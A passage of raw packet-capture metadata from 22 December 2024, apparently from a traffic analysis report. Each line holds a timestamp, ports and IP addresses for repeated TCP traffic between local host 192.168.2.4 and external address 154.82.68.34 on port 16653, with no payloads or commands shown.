                                      Dec 22, 2024 08:37:06.810538054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.810539961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.810581923 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.811748981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.811800957 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.811872005 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.811918020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.812987089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.813040972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.813102961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.813152075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.814194918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.814249039 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.814348936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.814402103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.815552950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.815607071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.815674067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.815726042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.816633940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.816682100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.816736937 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.816781998 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.817920923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.817974091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.818021059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.818068027 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.819144011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.819212914 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.819246054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.819298029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.820358038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.820419073 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.820478916 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.820533991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.821530104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.821579933 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.821582079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.821624994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.822782993 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.822841883 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.822901011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.822952032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.824023008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.824069023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.824142933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.824193954 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.825236082 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.825294971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.825367928 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.825417995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.826436043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.826495886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.826570034 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.826622009 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.827703953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.827759981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.827840090 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.827888966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.828893900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.828946114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.829011917 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.829061031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.830081940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.830133915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.837250948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.837447882 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.837532997 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.837831020 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.837889910 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.837954998 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.838007927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.839056015 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.839107990 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.839112043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.839155912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.840317965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.840369940 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.840419054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.840471029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.841635942 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.841686010 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.841819048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.841873884 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.842861891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.842897892 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.842911959 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.842942953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.844002962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.844055891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.844182014 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.844232082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.845218897 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.845263958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.845344067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.845395088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.846409082 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.846460104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.846528053 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.846580029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.847639084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.847692013 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.847759962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.847812891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.848866940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.848915100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.848918915 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.848958015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.850109100 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.850158930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.850161076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.850203037 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.851346016 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.851397038 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.851463079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.851516008 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.852560043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.852610111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.852741957 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.852792978 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.853915930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.853964090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.853967905 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.854012966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.855076075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.855123997 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.855254889 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.855303049 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.856245041 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.856297970 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.856621981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.856674910 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.857450962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.857502937 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.857569933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.857624054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.858676910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.858727932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.858741999 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.858793974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.859898090 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.859951019 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.860018015 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.860069990 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.861145973 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.861202002 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.861229897 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.861282110 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.862370968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.862426996 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.862682104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.862735033 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.863601923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.863650084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.863717079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.863768101 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.864816904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.864866018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.864929914 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.864980936 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.866059065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.866108894 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.866189957 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.866239071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.867270947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.867325068 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.867388964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.867439985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.868489981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.868541956 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.868542910 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.868582964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.960757971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.960839987 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.960851908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.960886002 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.961364031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.961420059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.961499929 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.961554050 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.962577105 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.962630033 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.962742090 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.962793112 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.963779926 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.963835001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.995075941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.995141983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.995168924 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.995215893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.995628119 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.995681047 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.995745897 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.995816946 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.996840000 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.996891022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.996961117 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.997006893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.998029947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.998074055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.998128891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.998174906 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.999346972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.999392033 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.999419928 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.999464035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.000565052 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.000612020 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.000617981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.000660896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.001707077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.001759052 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.001924038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.001971006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.002935886 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.002983093 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.003132105 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.003179073 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.004169941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.004215956 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.004415035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.004461050 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.005376101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.005424976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.005500078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.005556107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.006608009 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.006666899 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.006702900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.006752968 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.007833004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.007878065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.007920980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.007966042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.009059906 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.009104013 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.009130955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.009171963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.010288000 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.010339022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.010381937 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.010426044 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.011518955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.011567116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.011601925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.011647940 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.012783051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.012830019 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.012840986 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.012878895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.013972044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.014035940 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.014081001 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.014132977 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.015185118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.015232086 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.015275955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.015327930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.016459942 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.016509056 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.016735077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.016782999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.017635107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.017683029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.017771006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.017817020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.018862963 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.018912077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.018970013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.019016981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.020102024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.020148993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.020217896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.020263910 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.021308899 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.021356106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.021379948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.021420956 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.022535086 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.022582054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.029439926 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.029488087 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.029560089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.029608011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.030025005 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.030065060 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.030072927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.030102015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.030952930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.031002045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.031048059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.031092882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.032196999 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.032247066 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.032289982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.032331944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.033416033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.033463001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.033499956 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.033546925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.034653902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.034699917 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.034745932 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.034792900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.035850048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.035897970 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.035965919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.036012888 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.037092924 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.037142992 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.037235975 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.037281036 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.038305998 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.038352013 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.038402081 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.038450956 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.039542913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.039592028 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.039649010 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.039694071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.040771961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.040821075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.040863991 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.040914059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.041987896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.042043924 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.042087078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.042129993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.043222904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.043270111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.043345928 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.043386936 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.044442892 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.044490099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.044545889 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.044594049 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.045656919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.045705080 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:07.045753002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:07.045799017 CET4973016653192.168.2.4154.82.68.34
